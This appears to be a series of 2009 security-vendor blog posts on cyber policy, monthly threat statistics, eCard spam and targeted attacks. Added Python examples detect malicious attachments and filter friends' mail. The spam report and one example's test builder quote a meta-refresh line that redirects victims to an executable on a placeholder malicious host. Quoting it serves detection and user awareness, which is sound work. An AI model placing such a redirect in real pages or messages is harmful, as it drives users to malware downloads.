by Derek Manky July 2, 2009 at 3:29 pm
Remember that magical silver bullet I spoke of when discussing the U.S. cyber security plan and the future of cyber security? Well, there is still no such item in existence, and there likely never will be one key solution. Securing cyberspace is a global problem that cannot be addressed by one plan such as this. However, if this plan is properly implemented, enforced and refactored, it should be able to lead by example. It is always said that the Internet has no borders, which is an inherent problem in tackling cyber crime. Remember, this is a serious problem that spans our globe. If other governments followed suit with such an example, borders may indeed start to rise - but they will likely rise on a noticeably different public Internet than the one we know today.
The recently formed European Electronic Crime Task Force is an example of some of these ingredients beginning to mesh. This task force is currently composed of both the U.S. Secret Service and Italy's policing and postal services. These components were chosen as a core with experience and resources in monitoring and defense, and the initiative goes further to openly accept contributions from private IT operators and academic institutions. This is yet another example of the required collaboration with the private sector which I mentioned in my previous post, and indeed welcome news. While this is just another small step forward, it does help lay the groundwork required to begin effectively tackling such a large, international problem. To further refine this, more components are needed (on an international scale), and an active effort should be put forward by all private sectors and all other accepted sources. Then this initial groundwork can be expanded, detailed and refactored in an effort to generate a global, authoritative task force. I think what unfolds in the coming months and years in terms of this development is very important; too much complication and confusion can leave this framework, and the state of cyber security in general, in a very fragile state. Going back to the U.S. cyber security plan, I have taken the five broadly laid out points outlined by President Obama and prioritized them from 1 to 5 below with comments:
1) A response plan in collaboration with local and state governments, private sector
This chimes in precisely with what I believe is the No. 1 driver towards effective cyber security. You cannot have one individual, regardless of their knowledge and experience, in charge of security - whether it is a government entity or an enterprise IT administrator. The key is collaborating with existing resources to put all of the wheels in motion. Not only will this help with the response plan, it will directly help with proactive defense. I firmly believe part of this response plan should also be monitoring and reducing attack windows. Attacks build on their success because they are allowed to continue undetected for months after a breach - President Obama even admitted as much when his own sensitive data was compromised over a three-month period (August to October).
2) An open and transparent strategy that includes metrics (milestones, progress measurements through performance)
This is a very general statement that really applies to any project through its lifecycle. However, I believe it is very important to act on this and to perform reviews regularly through existing channels (see point #1 - collaboration) to address current issues and those on the horizon.
3) National cyber security awareness campaign from boardroom to classes
Education is a vital piece to understanding the problems of the future, and I think educating all levels on these matters is always a good and effective proactive measure. Many successful attacks launched to date have been carried out through social engineering, preying on victims who are simply unaware of existing threats.
4) Private-public partnership strengthening without dictating private sector
One of the major areas to be addressed is protecting critical infrastructure. Yet this section of the plan seems to place that responsibility on the private sector itself. If there is no enforcement on what is seen as one of the most important areas to safeguard, then I think a true opportunity is being missed to develop security around this area. The private sector has been perfectly happy using legacy protocols that serve their function, and I do not think that security will be brought to the forefront without any enforcement. As I mentioned previously, one of the main reasons SCADA networks are vulnerable to attack today is the fact that they are not closed circuit. They are not closed circuit because they have been bridged to the public Internet, and therefore to the threatscape, since that is less overhead and easier to manage. With no enforcement of policy, these networks will continue to be vulnerable to attack.
5) Research and development
Research and development is what got us into this mess in the first place: security was not kept in mind, and growth was what mattered. Thus software quickly became complex and integrated, giving cyber criminals room to attack. Even though it was not mentioned, I believe the key to R&D is the secure development lifecycle - think of all the prevalent problems that could be easily addressed through design (XSS, buffer overflows, etc.).
by Derek Manky July 1, 2009 at 12:12 pm
There was quite a bit of movement on the Threatscape this period, which I have summarized below. For more detail, our June 2009 Threatscape report can be found on Fortinet’s FortiGuard Center.
Web threat traffic in general rose significantly, with a noticeable difference in malware and phishing. Looking at period-over-period growth since the last report, phishing and malware web traffic growth was at its highest yet, with both posting significant gains. These gains represent more volume directed towards malicious sites, an ongoing trend as we continue to pave the way into the next generation of online services and threats. In line with the increase in web-borne malware, total malware detections have also been steadily increasing. While total malware detections have been increasing since March 2009, distinct volume (unique pieces of malicious code) detection remains relatively flat. Cyber criminals have been enjoying success by driving mass amounts of traffic to their threats, aided by a large online community utilizing a vast amount of vulnerable services.
For the first time in a while, Netsky has been knocked out of our Malware Top 10 list. Two of the main threat drivers we have seen this year, Online Gaming Trojans and Virut, remain very active, with Online Gaming Trojans in first and tenth position this report. W32/Virut.A, though falling two positions, held a strong fourth place amongst a barrage of Zbot activity. Two Zbot variants, W32/Zbot.M and W32/Zbot.V, landed in second and third position respectively. Zbot, a very widespread and prevalent keylogging / data siphoning trojan, was particularly active this month distributing its payload through fake eCard mail. The largest surges of Zbot activity occurred on June 2nd and June 12th, with W32/Zbot.M and W32/Zbot.V each going on two-day runs. Interestingly, JS/PackRedir.A moved up thirty-six positions to land in fifth place in our Malware Top 10 list. This obfuscated JavaScript redirects unfortunate visitors to further malicious sites that host malicious components through PDF and SWF files. This underscores the popularity of obfuscated attacks, whether through binary packers or script obfuscators - and also helps contribute to the aforementioned growth in web-borne malware attacks.
Building on last report's year-high active exploitation rate of 46.4%, 62 of 108 reported vulnerabilities this period had exploits launched against them. Over half of the newly reported vulnerabilities this period have been attacked, a 57.4% active exploitation rate. This is certainly a disturbing trend: exploits typically are not easy to write, and take considerable time and effort - unless you have resources at your disposal. With more attacks being launched against vulnerabilities, shown through a very high active exploitation rate, users need to be extra cautious about where they direct their web browsers. Many attacks are launched through this vector; remember to apply patches to guard against attacks like poisoned documents.
Spam rates remained consistent in June, with no direct effect following the laudable take-down of 3FN/Pricewert, another alleged spam-centric network. Last November, after the infamous McColo went down, we saw quite a dip in spam rates that took more than two months to recover. France took top spot for regional received spam, with Canada and Spain entering in fourth and fifth position respectively. The Canadian Pharmacy gang and other campaigns are frequently using simple HTM file attachments to hook users. The HTM files generally contain content of this form: <meta http-equiv='Refresh' content='0; url=hxxp://maldomain.com/malfile.exe' />
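As an added example (not from the post or from Fortinet), a small Python scanner that walks a message's .htm/.html attachments and flags the meta-refresh pattern quoted above, marking the hit when the target URL ends in an executable extension. The sample message is constructed inline; the domain is the post's own placeholder.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Extensions worth flagging when an instant meta refresh points straight at them.
EXECUTABLE_EXTS = (".exe", ".scr", ".com", ".bat", ".pif")

# Matches the pattern quoted in the post: <meta http-equiv='Refresh' content='0; url=...'>
# Quoting style, spacing and case vary between campaigns, so the regex is deliberately loose.
META_REFRESH = re.compile(
    r"<meta[^>]*http-equiv\s*=\s*['\"]?refresh['\"]?[^>]*"
    r"content\s*=\s*['\"]\s*(\d+)\s*;\s*url\s*=\s*([^'\"\s>]+)",
    re.IGNORECASE,
)

def scan_html_for_refresh(html: str) -> list:
    """Return (delay_seconds, url, points_at_executable) for every meta refresh found."""
    findings = []
    for m in META_REFRESH.finditer(html):
        delay, url = int(m.group(1)), m.group(2)
        path = url.split("?", 1)[0].lower()          # ignore any query string
        findings.append((delay, url, path.endswith(EXECUTABLE_EXTS)))
    return findings

def scan_message(raw: bytes) -> list:
    """Parse a raw RFC 822 message and scan each .htm/.html attachment for redirects."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if not name.endswith((".htm", ".html")):
            continue
        # get_content() undoes the transfer encoding and charset for text parts.
        for delay, url, is_exe in scan_html_for_refresh(part.get_content()):
            hits.append({"attachment": name, "delay": delay, "url": url, "executable": is_exe})
    return hits

def build_sample() -> bytes:
    """Constructed sample in the shape the post describes (not a real capture)."""
    msg = EmailMessage()
    msg["From"] = "pharmacy@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Your order"
    msg.set_content("Please open the attached page.")
    html = ("<html><head><meta http-equiv='Refresh' "
            "content='0; url=hxxp://maldomain.com/malfile.exe' /></head></html>")
    msg.add_attachment(html, subtype="html", filename="order.htm")
    return bytes(msg)

if __name__ == "__main__":
    for hit in scan_message(build_sample()):
        print(hit)
```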
by Derek Manky June 29, 2009 at 8:42 am
We have been receiving lots of spam in June with the age-old, eCard social engineering hook. The messages show up with these subject headers:
“You have received an eCard”
“You have received a greeting ecard”
“You Have Received a Greeting Card”
The bodies are all very simple: one piggybacks on the trusted name '123greetings.com', while the others are simpler still, instructing the recipient to open the eCard to view it. All traced malware variants are related to the ZBot family, or W32/Branvine.A!tr.dldr. The latter downloads Privacy Center (detected by Fortinet as W32/PCenter.A!tr), yet another fake security software (scareware) suite. We first discussed scareware at the height of its entry surge in September 2008. Ten months later, the spam campaigns still roll in. The campaign used two different attack methods with similar templates, one being the traditional attachment and the other malicious links:
Template 1 Snippet:
“Send free ecards from 123greetings.com with your choice of colors, words and music.
Your ecard will be available with us for the next 30 days. If you wish to keep the ecard longer, you may save it on your c
computer or take a print.
To view your ecard, open attached zip file”
Template 2 Snippet:
“To pick up your eCard, click on the following link (or copy & paste it into your web browser):
hxxp://method{removed}.com/
Your card will be aviailable for pick-up beginning for the next 30 days.”
Template 3 Snippet:
“To pick up your eCard, open attached file
We hope you enjoy you eCard.”
There are plenty of common red flags to pick up on here:
a) A link to a non-greeting card domain. Inspecting domains before following links will help - you can use our free URL lookup utility here:
http://www.fortiguardcenter.com/webfiltering/webfiltering.html#urllookup
b) Typos - common in all spam, partly to bypass filtering and partly genuine errors
c) eCard attachments. Most, if not all, eCard companies in operation do not supply eCard attachments (especially executables!), since they usually use an interactive site.
Can you spot another? To help users follow malicious links, spam mail often contains instructions to "copy & paste" the URL into your web browser. Sometimes they emphasize this - check out this latest image, received in a Canadian Pharmacy spam mail. Typing this into your address bar will only lead you to a fast-flux hosted proxy serving up fraudulent pills. Of course, the images are used in an effort to bypass spam detection:
Early this month we saw the closure of 3FN, an ISP taken down by the FTC due to complaints of malicious activity, with hopes of a second rally for the good guys after McColo's significant impact (a reduction in spam) when it went offline in November 2008. Looking at our systems, we have seen no significant change: spam rates are just as high as they were in May 2009, maintaining a steady volume much higher than we saw in December 2008 post-McColo. So, what does that mean? Traditional spam is not going away anytime soon. Always be careful following links, and do some quick research on domains ahead of time (i.e., use the tool mentioned above, or do a quick search using your favorite engine).
by Axelle Apvrille June 25, 2009 at 8:00 am
I don't know if you encounter the same problem as I do, but I keep on receiving spam from people I nonetheless like (friends, family, etc.). You know, the kind of awfully nice people who strangely feel compelled to forward their own rubbish: hoaxes, chain letters, petitions, jokes and, of course, a full load of lengthy attachments.
This is a real nuisance, yet I cannot report them to online spam-fighting websites, nor simply blacklist them: from time to time, among other mails, they do send interesting stuff (personal news, cool invitations), and also, they mean no harm; it's just that most of the time they are so convinced their e-mail will actually save an endangered species that they feel they have to forward it... Of course, I *did* try to educate them, telling them all of this was fake, providing URLs to check whether a mail is a hoax or not, explaining that their Happy New Year message would be just as fine in plain text rather than in a flashy PowerPoint slideshow. Let's face it: I failed. So, I have now decided to move on to another solution: the Friendly Automatic Filter and Answering Machine.
The idea is very simple: for all friends/families,
1. Filter out e-mails with banned extensions (in my case: pps, doc, exe, ppt)
2. Also filter e-mails which are too long (ex: people sending images they forget to scale down)
3. Automatically send an e-mail to the sender, telling him part of his message has been blocked and I will not be reading the attachment.
Actually, I spent a long time searching for such a tool on the Internet, but I could not find anything: mail clients such as Thunderbird or Alpine do not support customization of automatic answers (for example, a message body containing the sender's name and the time and date of their e-mail), Gmail filters only detect whether there is an attachment or not, but not which kind, and anti-spam tools are designed to delete the filtered message, not to answer it (indeed, in most cases, you must not reply to spam!) nor to filter out only the attachments. I finally started writing a very simple Perl script to handle the case. It's really basic, but it already saves me time.
Interested in trying this yourself? Get the script here.
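The three steps above, worked through in Python as an added example (this is not the author's Perl script): attachments with a banned extension or over a size limit are listed as blocked, and a reply naming the sender, the date of their mail and the blocked files is generated only for addresses on a friends list. The friends list, the size limit and the sample message are constructed assumptions; the banned extensions are the ones the post names.

```python
from email.message import EmailMessage
from email.utils import parseaddr, parsedate_to_datetime

# Assumptions for the example: a friends whitelist, the post's banned extensions,
# and an arbitrary size limit standing in for "too long" (step 2).
FRIENDS = {"alice@example.invalid"}
BANNED_EXTS = (".pps", ".doc", ".exe", ".ppt")
MAX_ATTACHMENT_BYTES = 200_000

def blocked_attachments(msg) -> list:
    """Steps 1 and 2: return (filename, reason) for every attachment the filter drops."""
    blocked = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        payload = part.get_payload(decode=True) or b""
        if name.lower().endswith(BANNED_EXTS):
            blocked.append((name, "banned extension"))
        elif len(payload) > MAX_ATTACHMENT_BYTES:
            blocked.append((name, f"too large ({len(payload)} bytes)"))
    return blocked

def build_auto_reply(msg, blocked):
    """Step 3: a friendly notice back to the sender. Only friends get one (never
    reply to real spam), and only when something was actually blocked."""
    name, addr = parseaddr(msg.get("From", ""))
    if addr not in FRIENDS or not blocked:
        return None
    sent = parsedate_to_datetime(msg["Date"]).strftime("%Y-%m-%d %H:%M %Z")
    reply = EmailMessage()
    reply["To"] = addr
    reply["Subject"] = "Re: " + msg.get("Subject", "")
    lines = [f"Hi {name or addr},",
             f"Part of your message sent on {sent} was blocked by my automatic filter:"]
    lines += [f"  - {fn}: {why}" for fn, why in blocked]
    lines.append("I will not be reading these attachments; the rest of your mail got through.")
    reply.set_content("\n".join(lines))
    return reply

def build_sample() -> EmailMessage:
    """Constructed message from a friend carrying one forwarded slideshow."""
    msg = EmailMessage()
    msg["From"] = "Alice <alice@example.invalid>"
    msg["To"] = "me@example.invalid"
    msg["Subject"] = "Fwd: Happy New Year!!!"
    msg["Date"] = "Thu, 25 Jun 2009 08:00:00 +0000"
    msg.set_content("You HAVE to see this, forward it to 10 friends!")
    msg.add_attachment(b"\xd0\xcf\x11\xe0 fake slideshow bytes", maintype="application",
                       subtype="vnd.ms-powerpoint", filename="newyear.pps")
    return msg

if __name__ == "__main__":
    sample = build_sample()
    print(build_auto_reply(sample, blocked_attachments(sample)))
```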
by Derek Manky June 18, 2009 at 10:05 am
While the next generation of tech has arguably arrived, it is simply a fact now that social networking sites and the blogosphere have become an integrated part of many people's lives - some may even call them home (at least for their browsers). In 2008, we predicted the wave of spam that would hit these "Web 2.0" platforms, as they were a natural target for spam to migrate to after years of living inside mass mailers. Indeed, throughout 2008 we witnessed a barrage of attacks on these sites: malicious social applications, "Spam 2.0", worms such as Koobface, XSS exploits, and various phishing campaigns. Here we are, a year and a half later, and the spam attacks not surprisingly continue.
Amongst all of this activity, more platforms with further complexity continue to arise and gain popularity, such as the micro-blogging site Twitter. Naturally, some of the aforementioned attacks have followed as well. One of the effective mechanisms of next-generation worms traversing linked accounts on social networking sites is that malicious links are sent out from one connected contact to another. Since most of these contacts presumably know each other, there is a higher level of trust - and a tendency for any recipient to let their guard down when clicking on these links. Most threat activity we have seen on social networking sites comes from harvested accounts, from worms like Koobface and from phishing campaigns. These accounts are typically used in ad-hoc fashion to blast out messages or invites to their contacts. Mass mailers, now typically hosted on botnets, follow the same pattern: they harvest accounts and send out spam to as many contacts as possible - and have been doing this for a very long time. Enter targeted attacks.
There has been an increasing trend of targeted attacks: ones that are premeditated and delivered to usually only a handful of recipients, if not just one. These are often delivered as poisoned documents that trigger exploits and drop malware such as keylogger trojans. For a detailed investigation, you may read further here. In parallel with the increasing targeted attack front, we have witnessed an increase in document exploit activity. Figure 1 below shows a six-month window of detected activity for commonly exploited document formats: XLS, DOC, and PDF:

With the amount of attacks circulating on next-generation platforms, "Web 2.0", whatever you want to call it - it is only a matter of time until cyber criminals become more aggressive and innovative with their methods. They have already started this transition and are in full swing with targeted attacks through traditional e-mail, so it is likely that they will follow suit and expand their horizons to new channels. Harvested accounts from social networks are primed for targeted attacks, and in theory would be even more effective than the already dangerous targeted attacks through traditional e-mail. This is because of several factors:
- Social networks host a wealth of information that would assist in social engineering hooks (think personal information and profiles, messages archived / posted, etc)
- User bases have exploded on popular social network sites, and everybody is participating: from end users, celebrities / officials and enterprise (marketing, PR, executives, the list goes on)
- Next-generation platforms not only support the basic attack vectors that e-mail does (files and malicious links), but offer many more opportunities for attack, innovation and expansion
- As I already pointed out, social networking rings / established contacts have a high degree of trust already
The framework is already in place to siphon account credentials with ease, as we have witnessed over the last year. With favored targeted attack methods becoming quite active (Figure 1 - poisoned documents), and ample opportunity on the horizon, suffice it to say that the Internet is indeed a scary and hostile place. Always try to validate the identity of any contact, especially when file attachments or links are involved.